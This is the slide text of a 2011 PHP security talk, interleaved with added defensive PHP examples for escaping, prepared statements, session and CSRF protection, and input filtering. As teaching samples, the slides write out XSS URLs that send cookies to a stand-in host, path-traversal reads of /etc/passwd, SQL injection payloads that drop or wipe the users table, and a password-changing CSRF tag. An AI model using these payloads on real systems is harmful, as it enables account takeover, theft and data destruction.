SydPHP Security in PHP

Security in PHP talk for SydPHP, Thursday 24th February, 2011

1. Security and PHP
   February 2011

2. Allan Shone
   Technical Yahoo!, Local Paranoid @Yahoo!7
   Been at Yahoo!7 just under 3 years
   allan.shone@yahoo.com

3. Website Security

4. What is Security?
   Why is Security important?
   What can you do about it?

5. Types of issues
   XSS
   SQL Injection
   Session Hijacking
   CSRF
   Phishing

6. Why XSS?

7. Lead to larger problems
   Used to inject code into your site
   Bad people ™ can steal user information

8. http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
   http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
   http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E

9. (slide with no text)

10. http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
    http://sydphp.leetbix.com/template.php?load=../some-config.conf%00

11. POST too

12. What do I do?!

13. Filter
    Simplest solution: htmlentities()
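The following is an added example, not code from the talk, showing what "filter with htmlentities()" looks like next to the pattern the slide-8 URLs exploit. It assumes a page shaped like the deck's template.php that reads a `load` query parameter; the function names, the template list and the PHP 7.1+ syntax are this example's own. It also covers the slide-10 case, where the same parameter is used as a file path: escaping does nothing there, so the name is checked against a fixed list instead.

```php
<?php
// Added example (not the talk's code). Assumes a page like template.php
// that reads a "load" parameter from the query string.

// Vulnerable pattern: the raw parameter is echoed into the page, so the
// <script> payloads from slide 8 execute in the visitor's browser.
function renderUnsafe(string $load): string
{
    return "<h1>Loading {$load}</h1>";
}

// Hardened output: htmlentities() turns < > & " ' into entities, so the
// browser shows the payload as text instead of running it. ENT_QUOTES also
// covers single quotes, which the default flags leave alone; naming the
// charset avoids surprises on older PHP defaults.
function escapeHtml(string $value): string
{
    return htmlentities($value, ENT_QUOTES, 'UTF-8');
}

function renderSafe(string $load): string
{
    return '<h1>Loading ' . escapeHtml($load) . '</h1>';
}

// Slide 10 uses the same parameter as a file path (../some-config.conf%00).
// Output escaping does not help there: only accept names from a fixed list
// (hypothetical list for this example) and never build a path from raw input.
const ALLOWED_TEMPLATES = ['home', 'about', 'contact'];

function resolveTemplate(string $load): ?string
{
    if (!in_array($load, ALLOWED_TEMPLATES, true)) {
        return null;   // unknown name: refuse rather than guess
    }
    return __DIR__ . '/templates/' . $load . '.php';
}

// The same handling applies to POST bodies ("POST too", slide 11).
$load = (string) ($_GET['load'] ?? '');

echo renderSafe($load);

$file = resolveTemplate($load);
if ($file === null) {
    http_response_code(404);
    echo '<p>Unknown template.</p>';
} else {
    include $file;
}
```

With `load=<script>alert(0);</script>` the page now prints the literal tag text inside the `<h1>`, and with `load=../some-config.conf%00` the list check fails before any filesystem call is made.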
14. SQL what?

15. Arbitrary SQL code being executed
    Bypass login, edit database content
    Find passwords, hidden information

16. http://sydphp.leetbix.com/login.php
    Password: ' OR 1=1 -- '
    ' OR 1=1; DROP TABLE users; -- '
    ' OR 1=1; UPDATE TABLE users SET password='' WHERE 1=1; -- '

17. Oh no!

18. http://xkcd.com/327/

19. escape

20. mysql_real_escape_string()
    addslashes()
    PDO
    PDO::quote()
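As an added example (not the talk's code), here is the slide-16 login query built the broken way next to the PDO approach from slide 20. It assumes a `users` table with `username` and `password` columns and an in-memory SQLite database, all constructed inline for the example; the function names are the example's own. Of the four options on slide 20, the `mysql_*` extension was removed in PHP 7 and `addslashes()` knows nothing about the connection's character set, so the example uses PDO: bound parameters first, `PDO::quote()` only as the fallback for a value that has to be spliced into the SQL text.

```php
<?php
// Added example (not the talk's code). Table layout and sample row are
// constructed here so the script runs against an in-memory SQLite database.

// Vulnerable pattern: string concatenation. The slide-16 password
// ' OR 1=1 -- ' rewrites the WHERE clause into one that is always true.
function buildQueryUnsafe(string $user, string $pass): string
{
    return "SELECT id FROM users WHERE username='$user' AND password='$pass'";
}

// Hardened: a prepared statement. Values travel separately from the SQL
// text, so quotes, semicolons and comment markers in them are just characters.
function findUser(PDO $db, string $user, string $pass): ?int
{
    $stmt = $db->prepare('SELECT id FROM users WHERE username = :u AND password = :p');
    $stmt->execute([':u' => $user, ':p' => $pass]);
    $id = $stmt->fetchColumn();            // false when no row matched
    return $id === false ? null : (int) $id;
}

// PDO::quote() is the escaping route the slide lists. It is the fallback for
// a literal that cannot be bound, and it must be applied to every value,
// every time, or the hole reopens.
function buildQueryQuoted(PDO $db, string $user, string $pass): string
{
    return 'SELECT id FROM users WHERE username=' . $db->quote($user)
         . ' AND password=' . $db->quote($pass);
}

// Constructed fixture: one user in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
// Plaintext password only to stay close to the slide; real code stores a
// password_hash() value and compares with password_verify().
$db->exec("INSERT INTO users (username, password) VALUES ('alice', 'secret')");

$payload = "' OR 1=1 -- '";

var_dump(findUser($db, 'alice', 'secret'));    // int(1): correct password
var_dump(findUser($db, 'alice', $payload));    // NULL: the payload is just a wrong password

echo buildQueryUnsafe('alice', $payload), "\n";     // shows the broken WHERE clause
echo buildQueryQuoted($db, 'alice', $payload), "\n"; // quotes doubled, payload stays a string
```

Running the script shows the difference in one glance: the concatenated query ends in `AND password='' OR 1=1 -- ''`, while the bound and quoted versions compare the whole payload as a password value and find no row.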
21. Session hijacking

22. Bad for users
    Bad for data integrity
    Easy to prevent

23. Not stand-alone

24. Cookies

25. Integrity checking
26. CSRF? Sugar?

27. Cross-site request forgery

28. Simple, but uncommon

29. <img src="http://othersite.com/changepasswd?new=onlyIKnow" />
    <script>
    a=document.createElement('img');a.src='http://badsite../';document.firstChild.appendChild(a);
    a.src='http://badsite.com/otherpage';
    </script>

30. Integrity, integrity
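Slides 23 to 25 (cookies, integrity checking) and slide 30 (integrity against CSRF) both come down to the same session plumbing, so the following single added example covers both; it is not code from the talk. It assumes PHP 7.3 or later for the array form of `session_set_cookie_params()`, and the `/changepasswd` route, session keys and function names are the example's own.

```php
<?php
// Added example (not the talk's code). Session cookie hardening, a session
// integrity check, and a CSRF token for state-changing forms.

// Cookie flags: HttpOnly keeps document.cookie (the slide-8 payload) from
// reading the session id, Secure keeps it off plain HTTP, and SameSite=Lax
// withholds it on cross-site POSTs and on the <img>-driven GET from slide 29.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Integrity check: remember a hash of the client's user agent on first use
// and refuse the session if it changes. A weak signal on its own, but it
// costs nothing and catches a copied cookie used from a different client.
function sessionIsConsistent(): bool
{
    $uaHash = hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
    if (!isset($_SESSION['ua_hash'])) {
        $_SESSION['ua_hash'] = $uaHash;
        return true;
    }
    return hash_equals($_SESSION['ua_hash'], $uaHash);
}

// After a successful login, issue a fresh session id so an id the attacker
// already holds (fixation or earlier theft) stops being valid.
function onLoginSuccess(int $userId): void
{
    session_regenerate_id(true);   // delete the old session file too
    $_SESSION['user_id'] = $userId;
}

// CSRF token: a random secret kept in the session and embedded in every
// state-changing form. A page on othersite.com can make the browser send the
// request, but it cannot read this value, so the check below fails for it.
function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function csrfIsValid(array $post): bool
{
    return isset($post['csrf'], $_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], (string) $post['csrf']);
}

if (!sessionIsConsistent()) {
    session_unset();
    session_destroy();
    http_response_code(403);
    exit('Session check failed.');
}

// The password change is POST-only: the slide-29 <img src="...changepasswd?new=...">
// is a GET and never reaches this branch, and a forged POST lacks the token.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_SERVER['REQUEST_URI'] === '/changepasswd') {
    if (!csrfIsValid($_POST)) {
        http_response_code(403);
        exit('Bad request token.');
    }
    // ... update the password for $_SESSION['user_id'] here
}

echo '<form method="post" action="/changepasswd">'
   . '<input type="hidden" name="csrf" value="'
   . htmlentities(csrfToken(), ENT_QUOTES, 'UTF-8') . '">'
   . '<input type="password" name="new"> <button>Change</button>'
   . '</form>';
```

The token is compared with `hash_equals()` rather than `==` so the comparison does not leak timing, and it is HTML-escaped on output for the same reason as any other value placed in a page.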
31. Phishing!

32. Same, but different?

33. But what can you do

34. PHP's filter functions

35. filter_has_var
    filter_id
    filter_input_array
    filter_input
    filter_list
    filter_var_array
    filter_var

36. No more SuperGlobals

37. $search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
    echo "<h3>No results found for '{$search}'.</h3>";
    echo "<a href='?search=$search&page=2'>Next page</a>";

38. INPUT_GET
    INPUT_POST
    INPUT_COOKIE
    INPUT_SERVER
    INPUT_ENV
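As an added example (not the talk's code), the slide-37 snippet is extended to the fuller "no more SuperGlobals" pattern: every input is read through the filter extension with a filter that matches its type, and validation filters are used where a value must be a number or URL rather than just display-safe text. The field names (`page`, `email`, `website`, `age`, `ref`) and the range limits are the example's own.

```php
<?php
// Added example (not the talk's code). Reads request data only through
// filter_input()/filter_input_array()/filter_var(), never $_GET/$_POST.

// Search term: sanitized for HTML, exactly as on slide 37. The sanitizer
// encodes < > & " ' so the value is safe as text inside the <h3>.
$search = (string) filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

// Page number: validated, not sanitized. Anything that is not an integer in
// range comes back as false (or null if absent), so it falls back to page 1.
$page = filter_input(INPUT_GET, 'page', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1, 'max_range' => 1000],
]);
if (!is_int($page)) {
    $page = 1;
}

// Several POST fields at once, each with its own filter. Missing keys come
// back as null and failed ones as false, so the caller can tell them apart.
$form = filter_input_array(INPUT_POST, [
    'email'   => FILTER_VALIDATE_EMAIL,
    'website' => ['filter' => FILTER_VALIDATE_URL, 'flags' => FILTER_FLAG_PATH_REQUIRED],
    'age'     => ['filter' => FILTER_VALIDATE_INT,
                  'options' => ['min_range' => 0, 'max_range' => 150]],
]) ?? [];

// Cookies go through the same API (INPUT_COOKIE, slide 38).
$ref = filter_input(INPUT_COOKIE, 'ref', FILTER_VALIDATE_URL);

// filter_var() applies the same filters to a value already in hand.
$limit = filter_var('25', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => 100]]);

// Output: the sanitized value is fine as text, but inside a URL it must be
// urlencoded (and & written as &amp; in the attribute). Take the raw value
// for that via FILTER_UNSAFE_RAW rather than reaching into $_GET.
$searchRaw = (string) filter_input(INPUT_GET, 'search', FILTER_UNSAFE_RAW);

echo "<h3>No results found for '{$search}'.</h3>";
echo '<a href="?search=' . urlencode($searchRaw) . '&amp;page=' . ($page + 1) . '">Next page</a>';

if ($form['email'] === false) {
    echo '<p>Please enter a valid e-mail address.</p>';
}
if (is_string($ref)) {
    echo '<p>Referred from ' . htmlentities($ref, ENT_QUOTES, 'UTF-8') . '</p>';
}
```

The split between sanitize and validate is the point to keep: `FILTER_SANITIZE_SPECIAL_CHARS` changes the value so it is safe to print, while the `FILTER_VALIDATE_*` filters reject anything that is not already of the expected type, which is what you want for numbers, e-mail addresses and URLs that feed further logic.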
39. Twitter
    Allan Shone - @cerealboy
    Jared Mooring - @jadzor
    Filter function filters: http://au2.php.net/manual/en/filter.filters.php